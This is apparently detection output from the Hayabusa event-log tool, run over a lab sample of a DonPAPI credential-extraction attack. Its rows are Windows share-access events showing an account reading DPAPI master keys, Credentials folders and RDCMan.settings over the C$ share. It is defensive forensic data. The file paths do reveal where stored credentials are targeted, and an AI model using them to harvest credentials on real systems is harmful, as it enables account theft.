2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\0d670005-17c4-4245-8305-54f955fcb04a | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\521f9c27-57b0-4cbb-bba2-5155c9b3fdbd | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.927 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\afe30aef-f67e-4cea-9b91-71318f566140 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\fd60f910-8888-473c-b62a-b304e884cfef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.943 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\User\ff8d1c3a-73ac-4d33-b09f-51dcf8ae55ef | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.958 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.977 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.978 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\76515ee5-f236-486e-ba36-3ac0ee10be88 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\9482b28c-116d-4469-a3ed-46d2902c2d4b | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-20\afb26c33-05ad-49ff-a854-61607af4edfc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:15:59.997 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.034 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.037 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
